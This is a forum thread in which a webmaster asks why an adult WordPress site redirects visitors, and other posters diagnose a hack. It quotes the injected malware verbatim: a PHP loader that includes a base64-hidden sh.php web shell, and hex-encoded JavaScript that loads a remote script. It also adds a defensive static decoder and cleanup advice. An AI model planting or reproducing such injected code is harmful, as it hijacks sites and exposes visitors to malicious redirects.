Hello, I hope someone here will help me. Today I was informed that there is redirection on my biggest site, but of course as usual I don't see anything from my computer and from proxies I tried, so I don't know what causes it. I have advertisement only from companies I always trusted, nastydollar and sextracker moneytree, there is also one trade script and that should be pretty much everything so I don't know where the redirection comes from and how long it hurts my site... Thanks for any help, the site is teen-porn-tube.com
Redirection issue
-
This is what I found:
Code:
01:47:03.040 0.376 829 275 GET 302 Redirect to: http://c4tracking01.com/aff/ep.php?act=200116:us-c&prog=1&site=90&skin=c4 http://speedclicks.ero-advertising.com/speedclicks/out.php?1=1&doc=IGVgu3Dty6GSAostqr8L2K4uQpGGG9kJqxw9NpiIUiRJTrqiDDR7dkadq3aCRibVgzMuMMTEaqRcdBHFUlYQV7PvWYodvBzt5kXjywSpa7HMidHXObQUYCj5dpH0TiRI&pid=29455&spaceid=134377&returnurl=http%3A%2F%2Fwww.adscampaign.com%2Fbanners.html&rcheck=MTMyMzg5NTA3Mg==
01:47:03.613 0.193 540 203 GET 302 Redirect to: http://www.cam4.com?act=200116~us-c http://c4tracking01.com/aff/ep.php?act=200116:us-c&prog=1&site=90&skin=c4
-
If I were to hack a WP site, I would insert js in the header with an exploit, most likely in a template file. Check one of these from your header:
teen-porn-tube.com/wp-content/themes/WPTube3/js/jquery-1.3.2.min.js
teen-porn-tube.com/wp-content/themes/WPTube3/js/jqueryslidemenu/jqueryslidemenu.js
Join the BEST cam affiliate program on the internet!
I've referred over $1.7mil in spending this past year, you should join in.

I make a lot more money in the medical field in a lab now, fuck you guys. Don't ask me to come back, but do join Chaturbate in my sig, it still makes bank without me touching shit for years..
-
went to your site via google search
after the page loaded I
got redirected here:
http://17.uso2.com/
edit/ now the browser that i left open in the background on your site is constantly bouncing between your page, a redirection page, and the target page (every 3 seconds)
LOL
Last edited by MikeFold; 12-14-2011, 12:07 PM.
nothing to promote
-
Also, maybe check wp-content/themes/theme-name/header.php and see if there is anything different there than what you see in your source. Usually malicious redirects are js that look like gibberish
Also, is that last line of js after html tag supposed to be there?..
-
It doesn't redirect for me anymore so I hope that fixed your problem
-
Ok good so it was probably this code? I'm not sure, what can I do to protect the site and other WordPress sites from this happening again?
Code:
<?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?><?php @ini_set('display_errors', 0); @error_reporting(0); $type = 'ob'; $sysadux = base64_decode('L2hvbWUvY2hlenp5L2RvbWFpbnMvdGVlbi1wb3JuLXR1YmUuY29tL3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvcGx1Z2lucy9pbmxpbmVwb3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3NoLnBocA=='); @include_once $sysadux;?><?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?>
-
That's what I was thinking too but wasn't sure if you put it there or not. Are you using the latest version of WP (3.3) and maybe upgrade your php.
And change your passwords
Last edited by Colmike9; 12-14-2011, 01:22 PM.
-
Site is still redirecting. This script is at the bottom of your index page under the </html> tag. Looks sinister to me.
<script>var i,y,x="3c736372697074206c616e67756167653d276a61766173637269707427207372633d27687474703a2f2f7777772e636c617961696d2e636f6d2f696e6465782e7068703f7265663d7765626578273e3c2f7363726970743e";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);</script>
-
Whenever you see encoded stuff like that it's usually bad, you can also use a decoder to see what the actual code was. There's a lot of "free" WordPress theme websites that will put stuff like this in the theme. Always go through your header and footer checking for it.
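Added example (not from any poster in this thread): a static decoder in Python for the two snippets quoted above. It decodes the hex and base64 strings as data without running them; `scan`, the regex names and the sample variables are assumptions of this example.

```python
import base64
import re

SCRIPT = re.compile(r"<script\b[^>]*>(.*?)</script>", re.S | re.I)
HEX_LITERAL = re.compile(r"[\"']([0-9a-fA-F\s]{32,})[\"']")
B64_CALL = re.compile(r"base64_decode\(\s*[\"']([A-Za-z0-9+/=]{16,})[\"']\s*\)")
INCLUDE = re.compile(r"\b(?:include|require)(?:_once)?\b")


def scan(text):
    """Return findings as dicts; payloads are decoded as data, never executed."""
    findings = []
    html_end = text.lower().rfind("</html>")
    for m in SCRIPT.finditer(text):
        body = m.group(1)
        if "unescape" not in body and "document.write" not in body:
            continue
        for lit in HEX_LITERAL.finditer(body):
            digits = re.sub(r"\s+", "", lit.group(1))  # tolerate wrapped literals
            if not digits or len(digits) % 2:
                continue
            findings.append({
                "kind": "hex-js",
                "after_html_close": html_end != -1 and m.start() > html_end,
                "decoded": bytes.fromhex(digits).decode("latin-1"),
            })
    for m in B64_CALL.finditer(text):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("latin-1")
        except ValueError:  # not valid base64, so not this pattern
            continue
        findings.append({
            "kind": "php-base64",
            "feeds_include": bool(INCLUDE.search(text)),
            "decoded": decoded,
        })
    return findings


# Sample input: the two snippets as posted in this thread.
SAMPLE_HTML = r'''</body>
</html>
<script>var i,y,x="3c736372697074206c616e67756167653d276a61766173637269707427207372633d27687474703a2f2f7777772e636c617961696d2e636f6d2f696e6465782e7068703f7265663d7765626578273e3c2f7363726970743e";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);</script>'''
SAMPLE_PHP = r"""<?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?><?php @ini_set('display_errors', 0); @error_reporting(0); $type = 'ob'; $sysadux = base64_decode('L2hvbWUvY2hlenp5L2RvbWFpbnMvdGVlbi1wb3JuLXR1YmUuY29tL3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvcGx1Z2lucy9pbmxpbmVwb3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3NoLnBocA=='); @include_once $sysadux;?><?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?>"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_HTML) + scan(SAMPLE_PHP):
        print(finding)
```

The base64 string decodes to the path of a second file, `sh.php` under `wp-includes`, so deleting only the injected header snippet leaves that file on the server.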
-
That's the script under html that I was talking about, thought it was deleted.. My bad
Last edited by Colmike9; 12-14-2011, 01:41 PM.
-
Yeah that injected script has been a problem with Wordpress in the past - but it's really because we're dumbasses and don't update and don't change passwords every now and then.
I don't know what your FTP client is Chezter but it probably uses a simple xml file to cache your log in to your server. Delete that cache or file or just blank the log-in fields out if you don't change your FTP password - it can be during uploads that the injector writes itself into your files/templates, or by accessing your wordpress templates as admin - and it propagates it to every page throughout your site.
To get rid of this one you're going to have to call your hosting tech support and tell them about the exploit. Before you call them, change your FTP password, change your Wordpress Password (change your admin username if you know how, "admin" default is just a security risk too), and let them know that you did.
And don't try to change anything (add a new post, FTP something to the server) until the tech department wipes it out.
When it happened to me I just called the hosting company and tech support had it taken out in a couple thousand pages in less than two minutes.
Oh, and update your version of wordpress.
YOU Are Industry News!
Press Releases: pr[at]payoutmag.com
Facebook: Payout Magazine! Facebook: MIKEB!
ICQ: 248843947
Skype: Mediaguy1
-
line 586 index.html
<!-- /wrapper -->
</body>
</html>
<script>var i,y,x="3c736372697074206c616e67756167653d276a61766173637269707427207372633d27687474703a2f2f7777772e636c617961696d2e636f6d2f696e6465782e7068703f7265663d7765626578273e3c2f7363726970743e";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);</script>
-
ok...tried it for you again (different box and browser)
it tried to hijack my browser.....i viewed source and this was still at the bottom
Code:
<script>var i,y,x="3c736372697074206c616e67756167653d276a61766173637269707427207372633d27687474703a2f2f7777772e636c617961696d2e636f6d2f696e6465782e7068703f7265663d7765626578273e3c2f7363726970743e";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);</script>
-
check the version of your FTP program -- is it up to date?
there was a problem like this a while back with old Filezilla apps -- maybe related